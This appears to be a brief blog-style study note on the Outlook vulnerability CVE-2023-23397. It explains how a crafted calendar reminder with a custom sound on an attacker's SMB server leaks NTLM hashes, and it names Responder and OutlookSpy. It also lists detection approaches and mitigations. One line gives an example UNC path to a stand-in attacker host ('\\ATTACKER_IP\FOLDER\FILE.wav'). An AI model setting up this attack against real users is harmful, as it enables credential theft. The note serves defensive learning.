Outlook - CVE-2023-23397
Vulnerability:
Zero day exploit – outlook calendar notification
Attack Surface: NTLMv2
NTLM (NT LAN Manager) is an authentication protocol, but it has mostly been replaced to Kerberos due to security limitations
UNC PATH
Attacker can point file to a specific UNC PATH
These are used on Windows OS to find network resources, (files, printers, shared docs) The paths look like this
\\ATTACKER_IP\FOLDER\FILE.wav
Summary:
Attacker is able to send notification/reminder to victims email which will trigger without user interaction. The reminder is crafted using Powershell COM object and set to use a custom sound that will be retrieve from the attacker SMB server. When the reminder pops up, it will send a request to play the sound from the attacker SMB server, while at the same time it will also send the NTLM authentication login and password hashes to the attacker.
Attack Vector:
(Kali) Responder Used to emulate SMB Server, port (445) It will capture any authentication attempt made against it.
Outlookspy (outlook plugin) -
Let you edit all of Outlook’s internal parameters directly, including the reminder sound file. This tool is not necesary this is to make easy to test the vulnerability.
Defender:
Sigma rules Sigma is for log files what Snort is for network traffic and YARA is for files. Log rules created to help identify detection across a network Writing SIEM searches in Sigma helps avoid vender locked-in, its easier to share threat intel.
YARA RulesIt looks for patterns within the files on disk, capable of checking the file by specific byte signature, hashes, or patterns.
Mitigations
- Add users to Security Group, to prevent from using NTLM
- Block TCP 445/SMP outbound, to avoid postexploitation
- Always keep your outlook up to date
- Disable WebClient service
0 Comments